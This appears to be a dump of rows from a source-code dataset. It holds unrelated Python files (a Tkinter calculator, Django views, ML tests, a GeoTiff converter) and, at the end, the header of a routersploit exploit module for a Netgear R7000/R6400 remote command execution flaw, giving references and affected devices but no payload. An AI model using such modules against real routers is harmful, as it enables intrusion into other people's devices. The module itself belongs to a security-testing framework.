        # arrange last button '=' at the bottom
        buttons[16].grid(row=5, column=0, columnspan=4)

    def createButton(self, val, write=True, width=7):
        """Create a button labelled val; write=None marks a non-echoing action key."""
        return Button(self.master, text=val, command=lambda: self.click(val, write), width=width)

    def click(self, text, write):
        """Handle a button press."""
        # Bugfix: 're' was used below without ever being imported, so pressing
        # '=' raised NameError. Imported locally to keep the fix self-contained.
        import re
        # 'write' argument if True means the value 'val' should be written on screen, if None, should not be written on screen
        if write == None:
            # only evaluate code when there is an equation to be evaluated
            if text == '=' and self.equation:
                # replace the unicode division sign with the python division symbol / using regex
                self.equation = re.sub(u"\u00F7", '/', self.equation)
                print(self.equation)
                # NOTE: eval() is tolerable here only because the equation is
                # assembled exclusively from the calculator's own buttons.
                answer = str(eval(self.equation))
                self.clear_screen()
                self.insert_screen(answer, newline=True)
            elif text == u"\u232B":
                self.clear_screen()
        else:
            # add text to screen
            self.insert_screen(text)

    def clear_screen(self):
        """Empty both the pending equation and the display."""
        # set equation to empty before deleting screen
        self.equation = ''
        self.screen.configure(state='normal')
        self.screen.delete('1.0', END)

    def insert_screen(self, value, newline=False):
        """Append value to the display and record it in the equation."""
        # 'newline' is currently unused -- kept for interface compatibility.
        self.screen.configure(state='normal')
        self.screen.insert(END, value)
        # record every value inserted in screen
        self.equation += str(value)
        self.screen.configure(state='disabled')
root = Tk()
my_gui = Calculator(root)
root.mainloop()
| 3,224 | -4 | 168 |
3d2916b1202748e89e7c4eb47fac405f50630f2f | 2,620 | py | Python | web_frontend/views.py | Nucleoos/condor-copasi | dcf069cfdb7ce9a5198b5fd495f98fa6433310ca | [
"Artistic-2.0"
] | 3 | 2020-09-11T13:06:52.000Z | 2022-02-21T15:03:17.000Z | web_frontend/views.py | Nucleoos/condor-copasi | dcf069cfdb7ce9a5198b5fd495f98fa6433310ca | [
"Artistic-2.0"
] | null | null | null | web_frontend/views.py | Nucleoos/condor-copasi | dcf069cfdb7ce9a5198b5fd495f98fa6433310ca | [
"Artistic-2.0"
] | 2 | 2016-10-17T00:22:23.000Z | 2021-12-20T13:12:54.000Z | from django.shortcuts import render_to_response
import datetime, pickle, os
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from django.http import HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
from web_frontend import settings
from django.core.urlresolvers import reverse
| 34.933333 | 156 | 0.675573 | from django.shortcuts import render_to_response
import datetime, pickle, os
from django import forms
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from django.http import HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
from web_frontend import settings
from django.core.urlresolvers import reverse
def mainPage(request):
    """Render the home page, including the Condor queue status if available."""
    pageTitle = 'Home'
    # Attempt to load the queue status from user_files/condor_status.pickle.
    # Best-effort: if the file is missing or unreadable we render without it.
    try:
        pickle_filename = os.path.join(settings.USER_FILES_DIR, 'condor_status.pickle')
        # Bugfix: pickles are binary data, so the file must be opened in 'rb'
        # mode; the context manager also guarantees the handle is closed.
        with open(pickle_filename, 'rb') as pickle_file:
            status = pickle.load(pickle_file)
    except Exception:
        pass
    if settings.CONDOR_POOL_STATUS != '':
        pool_status_page = settings.CONDOR_POOL_STATUS
    # locals() deliberately exposes pageTitle/status/pool_status_page to the template.
    return render_to_response('index.html', locals(), RequestContext(request))
def helpPage(request):
    """Render the static help page."""
    # locals() passes pageTitle (and request) through to the template context.
    pageTitle = 'Help'
    return render_to_response('help.html', locals(), RequestContext(request))
class LoginForm(forms.Form):
    """Simple username/password form used by loginPage."""
    username = forms.CharField(label='Username')
    # render_value=False: never echo the password back into the form field.
    password = forms.CharField(label='Password',widget=forms.PasswordInput(render_value=False))
def loginPage(request):
    """Display and process the login form; redirect already-authenticated users."""
    if request.user.is_authenticated():
        return HttpResponseRedirect(settings.SITE_SUBFOLDER)
    login_failure = False
    if request.method == 'POST':
        form = LoginForm(request.POST)
        if form.is_valid():
            cd = form.cleaned_data
            username = cd['username']
            password = cd['password']
            user = authenticate(username=username, password=password)
            if user is not None:
                # Successfully authenticated - log in
                login(request, user)
                # Honour the ?next= redirect target when present, otherwise
                # fall back to the index page. Narrowed from a bare except:
                # request.GET[...] raises a KeyError subclass when absent.
                try:
                    return HttpResponseRedirect(request.GET['next'])
                except KeyError:
                    return HttpResponseRedirect(reverse('index'))
            else:
                # Login unsuccessful; re-render the form with an error flag.
                login_failure = True
    else:
        form = LoginForm()
    pageTitle = 'Login'
    return render_to_response('login.html', {'pageTitle': pageTitle, 'login_failure': login_failure, 'form':form}, context_instance=RequestContext(request))
def logoutPage(request):
    """Log the current user out and return to the index page."""
    #Logout, then bounce back to the landing page
    logout(request)
    return HttpResponseRedirect(reverse('index'))
def handle_error(request, pageTitle, errors=None):
    """Render the generic 500 page with an optional list of error messages."""
    # A mutable default ([]) is shared across every call; normalise None
    # to a fresh list instead, so the template still sees 'errors' in locals().
    errors = [] if errors is None else errors
    return render_to_response('500.html', locals(), context_instance=RequestContext(request))
| 1,870 | 152 | 147 |
860f452e421076522902caa2d22053f6e0ab955f | 256 | py | Python | tools/mo/openvino/tools/mo/mo.py | IndiraSalyahova/openvino | ff2df42339e15645dc89095d4cd8ff032b4da250 | [
"Apache-2.0"
] | null | null | null | tools/mo/openvino/tools/mo/mo.py | IndiraSalyahova/openvino | ff2df42339e15645dc89095d4cd8ff032b4da250 | [
"Apache-2.0"
] | null | null | null | tools/mo/openvino/tools/mo/mo.py | IndiraSalyahova/openvino | ff2df42339e15645dc89095d4cd8ff032b4da250 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
if __name__ == "__main__":
    # Run via the subprocess_main entry point; framework=None means no
    # specific framework is forced on the command line.
    from subprocess_main import subprocess_main # pylint: disable=no-name-in-module
    subprocess_main(framework=None)
| 25.6 | 84 | 0.75 | #!/usr/bin/env python3
# Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
if __name__ == "__main__":
from subprocess_main import subprocess_main # pylint: disable=no-name-in-module
subprocess_main(framework=None)
| 0 | 0 | 0 |
fb62a66aba2ec478de9863a72671723cf3ae7f93 | 318 | py | Python | recruiter/permissions.py | b1pb1p/opensource-job-portal | 26aaf8415ed27112b94f4111d5136ec6f65b2205 | [
"MIT"
] | 199 | 2019-12-14T02:25:05.000Z | 2022-03-31T11:26:12.000Z | recruiter/permissions.py | sajib1066/opensource-job-portal | 1288046e32f009c38742a28e4552ffafafabf684 | [
"MIT"
] | 91 | 2019-12-12T12:19:34.000Z | 2022-03-25T05:52:04.000Z | recruiter/permissions.py | sajib1066/opensource-job-portal | 1288046e32f009c38742a28e4552ffafafabf684 | [
"MIT"
] | 131 | 2019-12-13T06:26:06.000Z | 2022-03-29T19:45:18.000Z | from rest_framework import permissions
| 31.8 | 77 | 0.726415 | from rest_framework import permissions
class RecruiterRequiredPermission(permissions.BasePermission):
    """Grant access only to authenticated recruiter or agency-recruiter users."""

    def has_permission(self, request, view):
        user = request.user
        if not user.is_authenticated:
            return False
        return bool(user.is_recruiter or user.is_agency_recruiter)
| 188 | 41 | 49 |
d0a137dc28fc14372d955c6d37be2c48ed58ce87 | 1,269 | py | Python | Day_25/inheritance.py | kiranrraj/100Days_Of_Coding | ab75d83be9be87fb7bc83a3f3b72a4638dab22a1 | [
"MIT"
] | null | null | null | Day_25/inheritance.py | kiranrraj/100Days_Of_Coding | ab75d83be9be87fb7bc83a3f3b72a4638dab22a1 | [
"MIT"
] | null | null | null | Day_25/inheritance.py | kiranrraj/100Days_Of_Coding | ab75d83be9be87fb7bc83a3f3b72a4638dab22a1 | [
"MIT"
] | null | null | null | # Title : Inheritance
# Author : Kiran Raj R.
# Date : 08:11:2020
import math
class Polygon:
"Create a simply polygon class, which takes number of sites and takes the maginute of each sides"
# triangle = Polygon(3)
# # triangle.get_sides()
# # triangle.print_sides()
triangle1 = Triangle()
triangle1.get_sides()
triangle1.findArea()
| 28.840909 | 107 | 0.603625 | # Title : Inheritance
# Author : Kiran Raj R.
# Date : 08:11:2020
import math
class Polygon:
    """A simple polygon: holds a side count and the side lengths.

    Side lengths start empty and are collected interactively by get_sides().
    """

    def __init__(self, num_sides):
        self.num_sides = int(num_sides)
        self.mag_sides = []

    def get_sides(self):
        # Prompt once per side; store the magnitudes in entry order.
        sides = []
        for idx in range(self.num_sides):
            sides.append(float(input(f"Enter the value for side {idx+1}: ")))
        self.mag_sides = sides

    def print_sides(self):
        # Nothing collected yet -> short message and bail out.
        if not self.mag_sides:
            print("No sides entered")
            return
        print(f"The polygon have {self.num_sides} sides")
        for idx in range(self.num_sides):
            print(f"The side {idx+1} is {self.mag_sides[idx]}")
class Triangle(Polygon):
    """A three-sided Polygon whose area is computed with Heron's formula."""

    def __init__(self):
        # A triangle always has exactly three sides.
        Polygon.__init__(self, 3)

    def findArea(self):
        a, b, c = self.mag_sides
        # Heron's formula: area = sqrt(s * (s-a) * (s-b) * (s-c))
        # (grouping kept identical to preserve float rounding).
        semi = (a + b + c) / 2
        product = semi * ((semi - a) * (semi - b) * (semi - c))
        area = math.sqrt(product)
        print(f"The area of the triangle with sides {a}, {b}, {c} is {area}")
# triangle = Polygon(3)
# # triangle.get_sides()
# # triangle.print_sides()
# Demo: build a triangle, read its three side lengths from stdin, print area.
triangle1 = Triangle()
triangle1.get_sides()
triangle1.findArea()
| 754 | 3 | 168 |
63a5dda4dfc333b4824d2a196607eff046eabd58 | 2,685 | py | Python | tools/request_sender.py | gusutabopb/pytrthree | 6c036e6ba44793261dea6017091423af3624050c | [
"MIT"
] | 2 | 2018-09-02T04:46:36.000Z | 2020-11-28T18:28:35.000Z | tools/request_sender.py | gusutabopb/pytrthree | 6c036e6ba44793261dea6017091423af3624050c | [
"MIT"
] | null | null | null | tools/request_sender.py | gusutabopb/pytrthree | 6c036e6ba44793261dea6017091423af3624050c | [
"MIT"
] | 1 | 2020-10-18T16:17:08.000Z | 2020-10-18T16:17:08.000Z | #!/usr/bin/env python
import argparse
import datetime
import pandas as pd
import yaml
from pytrthree import TRTH
from pytrthree.utils import retry
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Tool to send a series of requests to TRTH.')
parser.add_argument('--config', action='store', type=argparse.FileType('r'), required=True,
help='TRTH API configuration (YAML file)')
parser.add_argument('--template', action='store', type=argparse.FileType('r'), required=True,
help='Base template for the requests (YAML file)')
parser.add_argument('--criteria', action='store', type=argparse.FileType('r'), required=True,
help='Criteria for searching RICs and modifying queried fields (YAML file)')
parser.add_argument('--start', action='store', type=str, required=True,
help='Start date (ISO-8601 datetime string)')
parser.add_argument('--end', action='store', type=str, default=str(datetime.datetime.now().date()),
help='End date (ISO-8601 datetime string). Default to today\'s date.')
parser.add_argument('--group', action='store', type=str, default='1A',
help='Pandas datetime frequency string for grouping requests. Defaults to "1A".')
args = parser.parse_args()
api = TRTH(config=args.config)
api.options['raise_exception'] = True
criteria = yaml.load(args.criteria)
template = yaml.load(args.template)
dates = pd.date_range(args.start, args.end).to_series()
dateranges = [parse_daterange(i) for _, i in dates.groupby(pd.TimeGrouper(args.group))]
for daterange in dateranges:
for name, crit in criteria.items():
request = make_request(daterange, crit)
rid = retry(api.submit_ftp_request, request, sleep=30, exp_base=2)
api.logger.info(rid['requestID'])
api.logger.info('All requests sent!')
| 47.105263 | 105 | 0.660708 | #!/usr/bin/env python
import argparse
import datetime
import pandas as pd
import yaml
from pytrthree import TRTH
from pytrthree.utils import retry
def make_request(daterange, criteria):
    """Build a TRTH LargeRequestSpec for one date range and one criterion.

    NOTE(review): relies on the module-level globals `api` and `template`
    and on the loop variable `name` from the __main__ block below, so it
    is only callable from that loop -- consider passing them explicitly.
    """
    request = api.factory.LargeRequestSpec(**template)
    # Compact YYYYMMDD forms of the range, used only for the friendly name.
    short_dates = sorted([x.replace('-', '') for x in daterange.values()])
    search_result = api.search_rics(daterange, criteria['ric'], refData=False)
    ric_list = [{'code': i['code']} for i in search_result]
    request['friendlyName'] = '{}-{}_{}'.format(name, *short_dates)
    request['instrumentList']['instrument'] = ric_list
    request['dateRange'] = daterange
    # Optional per-criterion restriction of the queried message fields.
    if 'fields' in criteria:
        request['messageTypeList']['messageType'][0]['fieldList']['string'] = criteria['fields']
    return request
def parse_daterange(s):
    """Return {'start', 'end'} ISO date strings for a datetime Series."""
    first = s.iloc[0]
    last = s.iloc[-1]
    return {'start': str(first.date()), 'end': str(last.date())}
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Tool to send a series of requests to TRTH.')
    parser.add_argument('--config', action='store', type=argparse.FileType('r'), required=True,
                        help='TRTH API configuration (YAML file)')
    parser.add_argument('--template', action='store', type=argparse.FileType('r'), required=True,
                        help='Base template for the requests (YAML file)')
    parser.add_argument('--criteria', action='store', type=argparse.FileType('r'), required=True,
                        help='Criteria for searching RICs and modifying queried fields (YAML file)')
    parser.add_argument('--start', action='store', type=str, required=True,
                        help='Start date (ISO-8601 datetime string)')
    parser.add_argument('--end', action='store', type=str, default=str(datetime.datetime.now().date()),
                        help='End date (ISO-8601 datetime string). Default to today\'s date.')
    parser.add_argument('--group', action='store', type=str, default='1A',
                        help='Pandas datetime frequency string for grouping requests. Defaults to "1A".')
    args = parser.parse_args()
    api = TRTH(config=args.config)
    api.options['raise_exception'] = True
    # safe_load restricts parsing to plain YAML tags: yaml.load() can run
    # arbitrary Python constructors from a malicious file (and recent PyYAML
    # versions require an explicit Loader argument anyway).
    criteria = yaml.safe_load(args.criteria)
    template = yaml.safe_load(args.template)
    dates = pd.date_range(args.start, args.end).to_series()
    # One {'start', 'end'} dict per '--group' period of the daily index.
    dateranges = [parse_daterange(i) for _, i in dates.groupby(pd.TimeGrouper(args.group))]
    for daterange in dateranges:
        for name, crit in criteria.items():
            request = make_request(daterange, crit)
            # Retry with exponential backoff: 30s initial sleep, base 2.
            rid = retry(api.submit_ftp_request, request, sleep=30, exp_base=2)
            api.logger.info(rid['requestID'])
    api.logger.info('All requests sent!')
| 666 | 0 | 46 |
0ddfbadbbe65167ee077658fdcdc1211bdb095b7 | 1,789 | py | Python | Logistic_Regression/tests/test_logistic_regression.py | hectorLop/ML_algorithms | 0c5181e460640efc7e81210cf132f3bbd9d73910 | [
"MIT"
] | null | null | null | Logistic_Regression/tests/test_logistic_regression.py | hectorLop/ML_algorithms | 0c5181e460640efc7e81210cf132f3bbd9d73910 | [
"MIT"
] | null | null | null | Logistic_Regression/tests/test_logistic_regression.py | hectorLop/ML_algorithms | 0c5181e460640efc7e81210cf132f3bbd9d73910 | [
"MIT"
] | null | null | null | import pytest
import numpy as np
from sklearn import datasets
from Logistic_Regression.logistic_regression import LogisticRegression
@pytest.fixture
def test_logistic_regression(train_test_data_final):
"""
Tests the linear regression algorithm using the Normal Equation
"""
X_train, y_train = train_test_data_final
X_train, y_train = X_train[:, 3:], (y_train == 2).astype(np.int8).reshape(-1, 1) # Binary classification problem
X_test, y_test = np.array([[1.7], [1.5]]), np.array([[1], [0]])
log_reg = LogisticRegression(n_iterations=5000, batch_size=32)
log_reg.fit(X_train, y_train)
y_pred = log_reg.predict(X_test)
assert isinstance(y_pred, np.ndarray)
assert len(y_pred) > 0
assert y_pred.shape[0] == X_test.shape[0]
assert np.array_equal(y_test, y_pred)
| 30.844828 | 117 | 0.693684 | import pytest
import numpy as np
from sklearn import datasets
from Logistic_Regression.logistic_regression import LogisticRegression
@pytest.fixture
def train_test_data_final():
    """Provide the iris dataset as a (features, targets) pair of arrays."""
    iris = datasets.load_iris()
    X = iris['data']
    y = iris['target']
    return X, y
def test_logistic_regression(train_test_data_final):
    """
    Tests binary logistic regression (class 2 vs. the rest) on the single
    petal-width feature and checks the predictions for two known samples.
    """
    X_train, y_train = train_test_data_final
    X_train, y_train = X_train[:, 3:], (y_train == 2).astype(np.int8).reshape(-1, 1) # Binary classification problem
    X_test, y_test = np.array([[1.7], [1.5]]), np.array([[1], [0]])
    log_reg = LogisticRegression(n_iterations=5000, batch_size=32)
    log_reg.fit(X_train, y_train)
    y_pred = log_reg.predict(X_test)
    assert isinstance(y_pred, np.ndarray)
    assert len(y_pred) > 0
    assert y_pred.shape[0] == X_test.shape[0]
    assert np.array_equal(y_test, y_pred)
def test_logistic_regression_softmax(train_test_data_final):
    """Multiclass (softmax) prediction on the two petal features."""
    features, targets = train_test_data_final
    features = features[:, 2:]
    sample, expected = np.array([[5, 2]]), np.array([2])
    model = LogisticRegression(n_iterations=5000, batch_size=32)
    model.fit(features, targets)
    predicted = model.predict(sample)
    assert isinstance(predicted, np.ndarray)
    assert len(predicted) > 0
    assert predicted.shape[0] == sample.shape[0]
    assert np.array_equal(expected, predicted)
def test_logistic_regression_softmax_loss(train_test_data_final):
    """After fitting, the model records a truthy training loss."""
    features, targets = train_test_data_final
    features = features[:, 2:]
    model = LogisticRegression(n_iterations=5000, batch_size=32)
    model.fit(features, targets)
    assert model._loss
2664c817d15259cca23b6839c61cc8482c807f64 | 176 | py | Python | blogposts/admin.py | prithaupadhyay/code-talk | 1140e78d128c7cf7f7cf08039f3310bcd7cf0a52 | [
"MIT"
] | null | null | null | blogposts/admin.py | prithaupadhyay/code-talk | 1140e78d128c7cf7f7cf08039f3310bcd7cf0a52 | [
"MIT"
] | null | null | null | blogposts/admin.py | prithaupadhyay/code-talk | 1140e78d128c7cf7f7cf08039f3310bcd7cf0a52 | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import Question
from .models import Answer
# Register your models here
admin.site.register(Question)
admin.site.register(Answer)
| 22 | 32 | 0.818182 | from django.contrib import admin
from .models import Question
from .models import Answer
# Register your models here
admin.site.register(Question)
admin.site.register(Answer)
| 0 | 0 | 0 |
8c8f006b0635abe2b91d69c825cc97f2272505a5 | 1,605 | py | Python | tests/test_util.py | ecohealthalliance/concept-tools | 865a7ceb94ca8d927eb9a7ed53fcb6c1e1a68f53 | [
"Apache-2.0"
] | null | null | null | tests/test_util.py | ecohealthalliance/concept-tools | 865a7ceb94ca8d927eb9a7ed53fcb6c1e1a68f53 | [
"Apache-2.0"
] | null | null | null | tests/test_util.py | ecohealthalliance/concept-tools | 865a7ceb94ca8d927eb9a7ed53fcb6c1e1a68f53 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Test the utils"""
import sys
import os
import unittest
sys.path = ['./'] + sys.path
from util import is_meta
from util import get_canonical_id_from_url_segment
from util import get_canonical_id_from_title
if __name__ == '__main__':
unittest.main()
| 25.078125 | 74 | 0.493458 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Test the utils"""
import sys
import os
import unittest
sys.path = ['./'] + sys.path
from util import is_meta
from util import get_canonical_id_from_url_segment
from util import get_canonical_id_from_title
class UtilTest(unittest.TestCase):
    """Unit tests for the helpers in util.py."""
    def test_is_meta(self):
        """is_meta() is True only when a known meta prefix starts the title."""
        kinds = ['List_of_',
                 'Meta:',
                 'Help:',
                 'Template:',
                 'Talk:',
                 'User_talk:',
                 'User:',
                 'Portal:',
                 'Category:',
                 'MediaWiki:',
                 'Wikipedia:',
                 'File:',
                 'Book:',
                 'Draft:',
                 'Education_Program:',
                 'TimedText:',
                 'Module:',
                 'WP:',
                 'H:',
                 'CAT:',
                 'WT:',
                 'MOS:',
                 'Wikipedia_talk:',
                 'Special:',
                 'Transwiki:']
        # Each prefix must match at position 0 but not mid-string.
        for kind in kinds:
            self.assertEqual(is_meta(kind + "foo bar zap"), True)
            self.assertEqual(is_meta("foo" + kind + "foo bar zap"), False)
    def test_get_canonical_id_from_url_segment(self):
        """Percent-encoded URL segments decode to the Unicode canonical id."""
        segment = 'Champs-%C3%89lys%C3%A9es'
        _id = 'Champs-Élysées'
        self.assertEqual(_id, get_canonical_id_from_url_segment(segment))
    def test_get_canonical_id_from_title(self):
        """Spaces in titles become underscores in the canonical id."""
        title = 'Middle East'
        _id = 'Middle_East'
        self.assertEqual(_id, get_canonical_id_from_title(title))
if __name__ == '__main__':
unittest.main()
| 1,183 | 13 | 104 |
11a300dc84861ec3cce363d43775cbd888385cd9 | 3,348 | py | Python | docs/dev/Example4_gdal.py | vincentschut/isce2 | 1557a05b7b6a3e65abcfc32f89c982ccc9b65e3c | [
"ECL-2.0",
"Apache-2.0"
] | 1,133 | 2022-01-07T21:24:57.000Z | 2022-01-07T21:33:08.000Z | docs/dev/Example4_gdal.py | vincentschut/isce2 | 1557a05b7b6a3e65abcfc32f89c982ccc9b65e3c | [
"ECL-2.0",
"Apache-2.0"
] | 276 | 2019-02-10T07:18:28.000Z | 2022-03-31T21:45:55.000Z | docs/dev/Example4_gdal.py | vincentschut/isce2 | 1557a05b7b6a3e65abcfc32f89c982ccc9b65e3c | [
"ECL-2.0",
"Apache-2.0"
] | 235 | 2019-02-10T05:00:53.000Z | 2022-03-18T07:37:24.000Z | #!/usr/bin/env python3
import numpy as np
import argparse
from osgeo import gdal
import isce
import isceobj
import os
def cmdLineParse():
    '''
    Parse command line.

    Returns the argparse namespace with `infile`, `outfile` and `tarfile`.
    '''
    parser = argparse.ArgumentParser(description='Convert GeoTiff to ISCE file')
    parser.add_argument('-i','--input', dest='infile', type=str,
            required=True, help='Input GeoTiff file. If tar file is also included, this will be output file extracted from the TAR archive.')
    parser.add_argument('-o','--output', dest='outfile', type=str,
            required=True, help='Output GeoTiff file')
    parser.add_argument('-t','--tar', dest='tarfile', type=str,
            default=None, help='Optional input tar archive. If provided, Band 8 is extracted to file name provided with input option.')
    return parser.parse_args()
def dumpTiff(infile, outfile):
    '''
    Read geotiff tags.

    Writes the first raster band to `outfile` as raw float32 samples and
    returns a dict of size/extent metadata derived from the geotransform.
    '''
    ###Uses gdal bindings to read geotiff files
    data = {}
    ds = gdal.Open(infile)
    data['width'] = ds.RasterXSize
    data['length'] = ds.RasterYSize
    # GDAL geotransform: (origin_x, px_width, row_rot, origin_y, col_rot, px_height)
    gt = ds.GetGeoTransform()
    data['minx'] = gt[0]
    data['miny'] = gt[3] + data['width'] * gt[4] + data['length']*gt[5]
    data['maxx'] = gt[0] + data['width'] * gt[1] + data['length']*gt[2]
    data['maxy'] = gt[3]
    data['deltax'] = gt[1]
    data['deltay'] = gt[5]
    data['reference'] = ds.GetProjectionRef()
    band = ds.GetRasterBand(1)
    inArr = band.ReadAsArray(0,0, data['width'], data['length'])
    # Headerless raw dump; the ISCE XML written by the caller describes it.
    inArr.astype(np.float32).tofile(outfile)
    return data
def extractBand8(intarfile, destfile):
    '''
    Extracts Band 8 of downloaded Tar file from EarthExplorer

    Raises Exception when no member name ends in 'B8.TIF'.
    '''
    import tarfile
    import shutil
    fid = tarfile.open(intarfile)
    try:
        fileList = fid.getmembers()
        ###Find the band 8 file
        src = None
        for kk in fileList:
            if kk.name.endswith('B8.TIF'):
                src = kk
        if src is None:
            raise Exception('Band 8 TIF file not found in tar archive')
        print('Extracting: %s'%(src.name))
        ####Create source and target file Ids.
        srcid = fid.extractfile(src)
        try:
            with open(destfile, 'wb') as destid:
                ##Copy content
                shutil.copyfileobj(srcid, destid)
        finally:
            # The extracted member handle was previously never closed.
            srcid.close()
    finally:
        # Close the archive even when extraction fails part-way.
        fid.close()
if __name__ == '__main__':
    ####Parse cmd line
    inps = cmdLineParse()
    ####If input tar file is given
    # Band 8 is pulled out of the archive into inps.infile before conversion.
    if inps.tarfile is not None:
        extractBand8(inps.tarfile, inps.infile)
    print('Dumping image to file')
    meta = dumpTiff(inps.infile, inps.outfile)
#    print(meta)
    ####Create an ISCE XML header for the landsat image
    img = isceobj.createDemImage()
    img.setFilename(inps.outfile)
    img.setDataType('FLOAT')
    # Coordinate1 = x axis (west->east), Coordinate2 = y axis starting at maxy.
    dictProp = {
        'REFERENCE' : meta['reference'],
        'Coordinate1': {
            'size': meta['width'],
            'startingValue' : meta['minx'],
            'delta': meta['deltax']
        },
        'Coordinate2': {
            'size' : meta['length'],
            'startingValue' : meta['maxy'],
            'delta': meta['deltay']
        },
        'FILE_NAME' : inps.outfile
    }
    img.init(dictProp)
    img.renderHdr()
| 29.368421 | 142 | 0.565114 | #!/usr/bin/env python3
import numpy as np
import argparse
from osgeo import gdal
import isce
import isceobj
import os
def cmdLineParse():
'''
Parse command line.
'''
parser = argparse.ArgumentParser(description='Convert GeoTiff to ISCE file')
parser.add_argument('-i','--input', dest='infile', type=str,
required=True, help='Input GeoTiff file. If tar file is also included, this will be output file extracted from the TAR archive.')
parser.add_argument('-o','--output', dest='outfile', type=str,
required=True, help='Output GeoTiff file')
parser.add_argument('-t','--tar', dest='tarfile', type=str,
default=None, help='Optional input tar archive. If provided, Band 8 is extracted to file name provided with input option.')
return parser.parse_args()
def dumpTiff(infile, outfile):
'''
Read geotiff tags.
'''
###Uses gdal bindings to read geotiff files
data = {}
ds = gdal.Open(infile)
data['width'] = ds.RasterXSize
data['length'] = ds.RasterYSize
gt = ds.GetGeoTransform()
data['minx'] = gt[0]
data['miny'] = gt[3] + data['width'] * gt[4] + data['length']*gt[5]
data['maxx'] = gt[0] + data['width'] * gt[1] + data['length']*gt[2]
data['maxy'] = gt[3]
data['deltax'] = gt[1]
data['deltay'] = gt[5]
data['reference'] = ds.GetProjectionRef()
band = ds.GetRasterBand(1)
inArr = band.ReadAsArray(0,0, data['width'], data['length'])
inArr.astype(np.float32).tofile(outfile)
return data
def extractBand8(intarfile, destfile):
'''
Extracts Band 8 of downloaded Tar file from EarthExplorer
'''
import tarfile
import shutil
fid = tarfile.open(intarfile)
fileList = fid.getmembers()
###Find the band 8 file
src = None
for kk in fileList:
if kk.name.endswith('B8.TIF'):
src = kk
if src is None:
raise Exception('Band 8 TIF file not found in tar archive')
print('Extracting: %s'%(src.name))
####Create source and target file Ids.
srcid = fid.extractfile(src)
destid = open(destfile,'wb')
##Copy content
shutil.copyfileobj(srcid, destid)
fid.close()
destid.close()
if __name__ == '__main__':
####Parse cmd line
inps = cmdLineParse()
####If input tar file is given
if inps.tarfile is not None:
extractBand8(inps.tarfile, inps.infile)
print('Dumping image to file')
meta = dumpTiff(inps.infile, inps.outfile)
# print(meta)
####Create an ISCE XML header for the landsat image
img = isceobj.createDemImage()
img.setFilename(inps.outfile)
img.setDataType('FLOAT')
dictProp = {
'REFERENCE' : meta['reference'],
'Coordinate1': {
'size': meta['width'],
'startingValue' : meta['minx'],
'delta': meta['deltax']
},
'Coordinate2': {
'size' : meta['length'],
'startingValue' : meta['maxy'],
'delta': meta['deltay']
},
'FILE_NAME' : inps.outfile
}
img.init(dictProp)
img.renderHdr()
| 0 | 0 | 0 |
00e322d1a45b6855e615237ad9a73ebedbaae636 | 2,734 | py | Python | DIZED_APPS/INCANTATION/modules/exploits/routers/netgear/r7000_r6400_rce.py | tanc7/ArmsCommander-TestBed | e00bb166084735d8b0de058b54d6d98a057cd7d8 | [
"FSFUL"
] | 1 | 2018-10-17T04:49:42.000Z | 2018-10-17T04:49:42.000Z | DIZED_APPS/INCANTATION/routersploit/modules/exploits/routers/netgear/r7000_r6400_rce.py | tanc7/ArmsCommander-TestBed | e00bb166084735d8b0de058b54d6d98a057cd7d8 | [
"FSFUL"
] | null | null | null | DIZED_APPS/INCANTATION/routersploit/modules/exploits/routers/netgear/r7000_r6400_rce.py | tanc7/ArmsCommander-TestBed | e00bb166084735d8b0de058b54d6d98a057cd7d8 | [
"FSFUL"
] | null | null | null | from routersploit import (
exploits,
print_status,
print_success,
print_error,
http_request,
mute,
validators,
shell,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Netgear R7000 and R6400 Remote Code Execution vulnerability.
If the target is vulnerable, command loop is invoked that allows executing commands on operating system level.
"""
__info__ = {
'name': 'Netgear R7000 & R6400 RCE',
'description': 'Module exploits remote command execution in Netgear R7000 and R6400 devices. If the target is '
'vulnerable, command loop is invoked that allows executing commands on operating system level.',
'authors': [
'Chad Dougherty', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/',
'https://www.exploit-db.com/exploits/40889/',
'http://www.kb.cert.org/vuls/id/582384',
],
'devices': [
'R6400 (AC1750)',
'R7000 Nighthawk (AC1900, AC2300)',
'R7500 Nighthawk X4 (AC2350)',
'R7800 Nighthawk X4S(AC2600)',
'R8000 Nighthawk (AC3200)',
'R8500 Nighthawk X8 (AC5300)',
'R9000 Nighthawk X10 (AD7200)',
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port', validators=validators.integer)
@mute
| 35.973684 | 119 | 0.601317 | from routersploit import (
exploits,
print_status,
print_success,
print_error,
http_request,
mute,
validators,
shell,
)
class Exploit(exploits.Exploit):
    """
    Exploit implementation for Netgear R7000 and R6400 Remote Code Execution vulnerability.
    If the target is vulnerable, command loop is invoked that allows executing commands on operating system level.
    """
    __info__ = {
        'name': 'Netgear R7000 & R6400 RCE',
        'description': 'Module exploits remote command execution in Netgear R7000 and R6400 devices. If the target is '
                       'vulnerable, command loop is invoked that allows executing commands on operating system level.',
        'authors': [
            'Chad Dougherty', # vulnerability discovery
            'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
        ],
        'references': [
            'http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/',
            'https://www.exploit-db.com/exploits/40889/',
            'http://www.kb.cert.org/vuls/id/582384',
        ],
        'devices': [
            'R6400 (AC1750)',
            'R7000 Nighthawk (AC1900, AC2300)',
            'R7500 Nighthawk X4 (AC2350)',
            'R7800 Nighthawk X4S(AC2600)',
